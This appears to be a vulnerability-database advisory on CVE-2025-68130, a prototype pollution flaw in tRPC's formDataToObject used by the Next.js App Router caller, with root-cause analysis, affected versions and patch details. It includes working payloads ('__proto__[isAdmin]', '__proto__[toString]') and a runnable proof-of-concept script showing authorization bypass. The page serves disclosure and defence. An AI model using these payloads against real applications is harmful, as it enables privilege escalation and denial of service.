N/A

CVSS Score

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-68130

CVE-2025-68130: tRPC has possible prototype pollution in `experimental_nextAppDirCaller`

Note that this vulnerability is only present when using experimental_caller / experimental_nextAppDirCaller.

Summary

A Prototype Pollution vulnerability exists in @trpc/server's formDataToObject function, which is used by the Next.js App Router adapter. An attacker can pollute Object.prototype by submitting specially crafted FormData field names, potentially leading to authorization bypass, denial of service, or other security impacts.

Affected Versions

Package: @trpc/server
Affected Versions: >=10.27.0
Vulnerable Component: formDataToObject() in src/unstable-core-do-not-import/http/formDataToObject.ts

Vulnerability Details

Root Cause

The set() function in formDataToObject.ts recursively processes FormData field names containing bracket/dot notation (e.g., user[name], user.address.city) to create nested objects. However, it does not validate or sanitize dangerous keys like __proto__, constructor, or prototype.

Vulnerable Code

// packages/server/src/unstable-core-do-not-import/http/formDataToObject.ts
function set(obj, path, value) {
  if (path.length > 1) {
    const newPath = [...path];
    const key = newPath.shift();  // ← No validation of dangerous keys
    const nextKey = newPath[0];

    if (!obj[key]) {  // ← Accesses obj["__proto__"] which returns Object.prototype
      obj[key] = isNumberString(nextKey) ? [] : {};
    }
    
    set(obj[key], newPath, value);  // ← Recursively pollutes Object.prototype
    return;
  }
  // ...
}

export function formDataToObject(formData) {
  const obj = {};
  for (const [key, value] of formData.entries()) {
    const parts = key.split(/[\.\[\]]/).filter(Boolean);  // Splits "__proto__[isAdmin]" → ["__proto__", "isAdmin"]
    set(obj, parts, value);
  }
  return obj;
}

Attack Vector

When a user submits a form to a tRPC mutation using Next.js Server Actions, the nextAppDirCaller adapter processes the FormData:

// packages/server/src/adapters/next-app-dir/nextAppDirCaller.ts:88-89
if (normalizeFormData && input instanceof FormData) {
  input = formDataToObject(input);  // ← Vulnerable call
}

An attacker can craft FormData with malicious field names:

const formData = new FormData();
formData.append("__proto__[isAdmin]", "true");
formData.append("__proto__[role]", "superadmin");

When processed, this pollutes Object.prototype:

{}.isAdmin        // → "true"
{}.role           // → "superadmin"

Proof of Concept

# Step 1: Create the project directory

mkdir trpc-vuln-poc
cd trpc-vuln-poc

# Step 2: Initialize npm

npm init -y

# Step 3: Install vulnerable tRPC

npm install @trpc/server@11.7.2

# Step 4: Create the test file

Test.js

const { formDataToObject } = require('@trpc/server/unstable-core-do-not-import');

console.log("=== PoC Prototype Pollution en tRPC ===\n");

console.log("[1] Estado inicial:");
console.log("    {}.isAdmin =", {}.isAdmin);

const fd = new FormData();
fd.append("__proto__[isAdmin]", "true");
fd.append("__proto__[role]", "superadmin");
fd.append("username", "attacker");

console.log("\n[2] FormData malicioso:");
console.log('    __proto__[isAdmin] = "true"');
console.log('    __proto__[role] = "superadmin"');

console.log("\n[3] Llamando formDataToObject()...");
const result = formDataToObject(fd);
console.log("    Resultado:", JSON.stringify(result));

console.log("\n[4] Después del ataque:");
console.log("    {}.isAdmin =", {}.isAdmin);
console.log("    {}.role =", {}.role);

const user = { id: 1, name: "john" };
console.log("\n[5] Impacto en autorización:");
console.log("    Usuario normal:", JSON.stringify(user));
console.log("    user.isAdmin =", user.isAdmin);

if (user.isAdmin) {
    console.log("\n    VULNERABLE - Authorization bypass exitoso!");
} else {
    console.log("\n    ✓ Seguro");
}

Impact

Authorization Bypass (HIGH)

Many applications check user permissions using property access:

// Vulnerable pattern
if (user.isAdmin) {
  // Grant admin access
}

After pollution, all objects will have isAdmin: "true", bypassing authorization.

Denial of Service (MEDIUM)

Polluting commonly used property names can crash applications:

formData.append("__proto__[toString]", "not_a_function");
// All subsequent .toString() calls will fail

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2025-68130

CVE-2025-68130:

N/A

CVSS Score

-

CVSS Score

Basic Information

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
@trpc/server	npm	>= 10.27.0, < 10.45.3	10.45.3
@trpc/server	npm	>= 11.0.0, < 11.8.0	11.8.0

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability is a classic prototype pollution issue in the @trpc/server package, occurring in the formDataToObject utility function. This function is used by the Next.js App Router integration (experimental_nextAppDirCaller). The root cause is the set helper function, which recursively builds a JavaScript object from key paths derived from FormData field names.

The set function failed to block dangerous keys like __proto__. When a malicious FormData payload, such as one containing the field __proto__[isAdmin], was submitted, the key would be split into the path ['__proto__', 'isAdmin']. The set function would then be called with this path. The original code would recursively call set(obj['__proto__'], ['isAdmin'], 'true'), which resolves to set(Object.prototype, ['isAdmin'], 'true'), thereby adding the isAdmin property to the global Object.prototype.

As a result, any object in the application that doesn't have its own isAdmin property would inherit it from the polluted prototype. This could lead to severe security issues, most notably authorization bypass, where a check like if (user.isAdmin) would unexpectedly evaluate to true for any user.

The patch addresses this vulnerability by introducing an isUnsafeKey function to explicitly block keys like __proto__, constructor, and prototype within the set function. Additionally, it changes the initial object creation in formDataToObject to use Object.create(null), creating an object without a prototype, which prevents pollution of Object.prototype. The property existence check was also changed to Object.hasOwn() to avoid traversing the prototype chain. The identified vulnerable functions, set and formDataToObject, are the core components where the unsafe processing of malicious input occurs.

Vulnerable functions

set

packages/server/src/unstable-core-do-not-import/http/formDataToObject.ts

This function recursively constructs a nested object from a path array. Before the patch, it did not validate if the keys in the path were unsafe (e.g., `__proto__`). This allowed an attacker to provide a path like `['__proto__', 'isAdmin']`, which would cause the function to modify `Object.prototype` instead of the intended object, leading to prototype pollution.

formDataToObject

packages/server/src/unstable-core-do-not-import/http/formDataToObject.ts

This function is the entry point for the vulnerability. It takes `FormData` and calls the `set` function to convert it into an object. The vulnerability is triggered here because it processes user-controlled form data keys without sanitization, passing them to the vulnerable `set` function. The patch mitigates this by creating a null-prototype object, so it cannot be polluted.

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

N/A

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2025-68130: tRPC has possible prototype pollution in `experimental_nextAppDirCaller`

Summary

Affected Versions

Vulnerability Details

Root Cause

Vulnerable Code

Attack Vector

Proof of Concept

Test.js

Impact

Authorization Bypass (HIGH)

Denial of Service (MEDIUM)

CVE-2025-68130:

N/A

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

N/A

N/A

CVE-2025-68130: tRPC has possible prototype pollution in `experimental_nextAppDirCaller`

Summary

Affected Versions

Vulnerability Details

Root Cause

Vulnerable Code

Attack Vector

Proof of Concept

Test.js

Impact

Authorization Bypass (HIGH)

Denial of Service (MEDIUM)

Basic Information

Basic Information

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI